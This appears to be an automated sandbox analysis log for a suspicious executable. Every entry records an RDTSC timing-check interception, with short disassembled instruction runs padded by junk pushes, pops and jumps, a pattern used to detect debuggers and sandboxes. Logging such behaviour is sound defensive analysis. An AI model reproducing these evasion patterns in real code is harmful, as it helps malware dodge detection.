                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71ABF6 second address: 71ABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71ABFC second address: 71AC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71AC00 second address: 71AC0A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F333124C7D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71AC0A second address: 71AC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3331238820h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71AC26 second address: 71AC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F333124C7DEh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71B4A0 second address: 71B4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71B4A6 second address: 71B4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 724072 second address: 7240A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3331238824h 0x00000007 push ecx 0x00000008 jmp 00007F3331238825h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 724386 second address: 72438B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72438B second address: 7243C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F3331238816h 0x0000000c popad 0x0000000d jg 00007F3331238826h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F333123881Eh 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d jmp 00007F3331238825h 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72485E second address: 72489A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F333124C7F1h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F333124C7E7h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72613A second address: 72613E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72613E second address: 726189 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F333124C7E5h 0x0000000c jno 00007F333124C7D6h 0x00000012 pop ebx 0x00000013 pop esi 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a jne 00007F333124C7D6h 0x00000020 popad 0x00000021 pushad 0x00000022 je 00007F333124C7D6h 0x00000028 je 00007F333124C7D6h 0x0000002e jc 00007F333124C7D6h 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 726189 second address: 72618D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6708D4 second address: 6708F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F333124C7E8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72C33D second address: 72C341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72C341 second address: 72C345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72C345 second address: 72C368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3331238816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3331238824h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72C808 second address: 72C848 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jng 00007F333124C7D6h 0x0000000f pop esi 0x00000010 jo 00007F333124C7DEh 0x00000016 jns 00007F333124C7D6h 0x0000001c pushad 0x0000001d popad 0x0000001e jne 00007F333124C7DEh 0x00000024 popad 0x00000025 pushad 0x00000026 jmp 00007F333124C7DEh 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72C848 second address: 72C84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72C84C second address: 72C863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F333124C7DFh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72C863 second address: 72C867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72C9A7 second address: 72C9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F333124C7E8h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72CDEF second address: 72CDF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72CDF4 second address: 72CE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F333124C7DFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72DF3D second address: 72DF4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F3331238816h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72DF4F second address: 72DF53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 72DF53 second address: 72DF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F3331238822h 0x0000000c jng 00007F3331238816h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 736CC6 second address: 736CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 736CCA second address: 736CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 736CD3 second address: 736CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 736CDA second address: 736CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 736848 second address: 73685E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007F333124C7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F333124C7D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 73685E second address: 736862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 678CE5 second address: 678CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F333124C7D6h 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jg 00007F333124C7D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 678CFC second address: 678D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 748FCB second address: 748FEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 748FEE second address: 748FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 748FF5 second address: 748FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 748FFA second address: 74902A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F333123881Eh 0x00000009 jp 00007F3331238816h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F3331238823h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 752A94 second address: 752AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F333124C7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 757950 second address: 757964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3331238820h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 757964 second address: 757968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 75AAC8 second address: 75AAD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F3331238816h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 75D592 second address: 75D5B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F333124C7DCh 0x0000000f jnl 00007F333124C7D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7693B1 second address: 7693B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7693B5 second address: 7693BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7693BB second address: 7693D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3331238826h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7693D9 second address: 7693EF instructions: 0x00000000 rdtsc 0x00000002 je 00007F333124C7D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7693EF second address: 7693F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7693F7 second address: 7693FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76809D second address: 7680AC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3331238818h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76905D second address: 769069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F333124C7D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 769069 second address: 76906D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76906D second address: 769082 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F333124C7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jg 00007F333124C7DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 769082 second address: 76909E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007F3331238816h 0x0000000b jnp 00007F3331238816h 0x00000011 jo 00007F3331238816h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76909E second address: 7690A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F333124C7D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76B56C second address: 76B580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F333123881Ah 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76B580 second address: 76B58A instructions: 0x00000000 rdtsc 0x00000002 js 00007F333124C7DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76B58A second address: 76B59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F333123881Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76B59C second address: 76B5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76D20D second address: 76D213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 76D213 second address: 76D218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 779ECC second address: 779ED4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 779D57 second address: 779D87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F333124C7DCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007F333124C7DCh 0x00000012 pushad 0x00000013 jmp 00007F333124C7DDh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 779D87 second address: 779D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 77DA76 second address: 77DA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 77DA7C second address: 77DA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3331238816h 0x0000000a popad 0x0000000b jmp 00007F3331238828h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7773A5 second address: 7773AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 78A8AC second address: 78A8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push ebx 0x00000007 jl 00007F3331238816h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 78C46C second address: 78C470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 78C470 second address: 78C486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F333123881Ch 0x0000000c jnc 00007F3331238816h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 67F89B second address: 67F8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 67F8A5 second address: 67F8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 67F8B3 second address: 67F8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F333124C7D6h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F333124C7E9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 67F8DB second address: 67F8DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 67F8DF second address: 67F8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 67F8E5 second address: 67F8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jns 00007F3331238816h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7A141E second address: 7A1469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F333124C7E6h 0x0000000b pop edx 0x0000000c jnl 00007F333124C815h 0x00000012 jp 00007F333124C7DEh 0x00000018 jg 00007F333124C7D6h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 jmp 00007F333124C7E6h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7A1469 second address: 7A146D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7A19A0 second address: 7A19A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7A19A9 second address: 7A19B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7A19B1 second address: 7A19C5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F333124C7D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7A19C5 second address: 7A19EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3331238823h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007F3331238816h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7A19EA second address: 7A19F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F333124C7D6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7A1C7C second address: 7A1CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jno 00007F3331238816h 0x0000000e popad 0x0000000f jmp 00007F3331238820h 0x00000014 pushad 0x00000015 jno 00007F3331238816h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7AB298 second address: 7AB2B3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F333124C7E6h 0x00000008 jmp 00007F333124C7E0h 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B9F4B second address: 6B9F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E204C6 second address: 4E204CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E204CA second address: 4E204D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 4E204D0 second address: 4E204D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
